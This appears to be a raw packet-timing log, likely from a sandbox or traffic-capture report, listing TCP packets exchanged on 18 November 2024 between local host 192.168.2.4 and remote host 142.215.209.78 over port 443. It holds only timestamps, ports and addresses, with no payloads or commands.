Nov 18, 2024 18:37:26.343107939 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.343512058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.343586922 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.343606949 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.344234943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.344285965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.344302893 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.344309092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.344341993 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.345047951 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.345120907 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.345124960 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.345886946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.345932961 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.345964909 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.345976114 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.346002102 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.346864939 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.346904993 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.346929073 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.346947908 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.346967936 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.347870111 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.347912073 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.347934008 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.347943068 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.347965002 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.348767042 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.348838091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.348860025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.348864079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.349150896 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.349661112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.349744081 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.349752903 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.394548893 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.462008953 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.462110996 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.462126017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.462177992 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.462254047 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.462260008 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.463196993 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.463248968 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.463279009 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.463288069 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.463331938 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.463481903 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.463541985 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.463548899 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.463983059 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464020967 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464042902 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.464057922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464106083 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.464713097 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464781046 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.464786053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464818001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464857101 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464876890 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.464880943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.464935064 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.465538025 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.465612888 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.465626001 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.465646029 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.465686083 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.465713024 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.465722084 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.465727091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.465774059 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.465790987 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.465845108 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.466408014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.466532946 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.466538906 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.466645002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.466800928 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.466809988 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.467108011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.467175961 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.467180014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.467375994 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.467447042 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.467452049 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.467492104 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.467601061 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.467607021 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.468005896 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.468050957 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.468091965 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.468099117 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.468188047 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.468911886 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.468960047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.468982935 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.468996048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.469038010 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.469047070 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.469131947 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.469137907 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.469798088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.469882965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.469949007 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.469964027 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.469964027 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.469978094 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.470022917 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.470052004 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.470740080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.470782995 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.470824957 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.470829010 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.470869064 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.470910072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.470910072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.470917940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.470935106 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.471054077 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.471695900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.471752882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.471766949 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.471772909 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.471807957 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.471862078 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.471862078 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.471873045 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.471929073 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.472644091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.472682953 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.472708941 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.472726107 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.472779036 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.472779036 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.582483053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.582700014 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.582710981 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.583158016 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.583250046 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.583266020 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.583340883 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.583405018 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.583410025 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.583538055 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.583616972 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.583623886 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584029913 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584083080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584093094 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.584110022 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584148884 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.584153891 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584223986 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.584229946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584522963 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584604025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.584609032 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584656954 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584726095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584741116 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.584748030 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584788084 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584803104 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.584808111 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.584860086 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.585602999 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.585681915 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.585697889 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.585704088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.585741043 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.585763931 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.585814953 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.585819960 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.586328030 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.586394072 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.586425066 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.586429119 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.586482048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.586503983 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.586590052 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.586595058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587213039 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587289095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587305069 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.587308884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587358952 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587421894 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.587421894 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.587428093 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587439060 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587497950 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.587503910 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.587558985 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588027954 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588098049 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588120937 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588124990 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588155031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588181019 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588181019 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588187933 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588217020 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588262081 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588656902 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588741064 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588754892 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588864088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588927031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588973045 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.588987112 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588987112 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.588992119 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.589097023 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.589097023 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.589103937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.589844942 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.589931011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.589978933 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.589993000 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.589993000 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.589998007 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590043068 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.590054035 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590060949 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590115070 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.590120077 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590646982 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590696096 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590708971 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.590713978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590831041 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590864897 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.590893984 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590905905 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.590912104 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.590966940 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.590974092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.591061115 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.591624975 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.591681957 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.591706991 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.591711044 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.591773987 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.591773987 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.592226982 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592283964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592298985 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.592307091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592377901 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.592382908 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592830896 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592911959 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.592916012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592952967 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.592998028 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.593003035 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.593019009 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.593077898 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.593081951 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.594098091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.594160080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.594173908 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.594177961 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.594223976 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.594233990 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.594243050 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.594362020 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.595304012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.595356941 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.595372915 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.595383883 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.595449924 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.595459938 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.595500946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.595529079 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.595531940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.595601082 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.596339941 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.596429110 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.596434116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.596764088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.596823931 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.596839905 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.596847057 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.596899033 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.596926928 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.596963882 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.596968889 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.597978115 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598038912 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598048925 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.598056078 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598095894 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.598104000 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598192930 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.598200083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598536968 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598587036 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.598596096 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.598997116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599054098 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599059105 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599076033 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599133015 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599149942 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599179983 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599236012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599256039 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599260092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599337101 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599740028 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599788904 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599802017 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599807978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599844933 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599848986 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599877119 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599895000 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599899054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599940062 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599947929 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.599973917 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.599977016 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.600008011 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.600099087 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.600346088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.600425005 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.600445986 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.600450039 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.627836943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.627926111 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.627932072 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.675756931 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.702756882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.702850103 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.702856064 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703046083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703125000 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.703130007 CET	443	49731	142.215.209.78	192.168.2.4
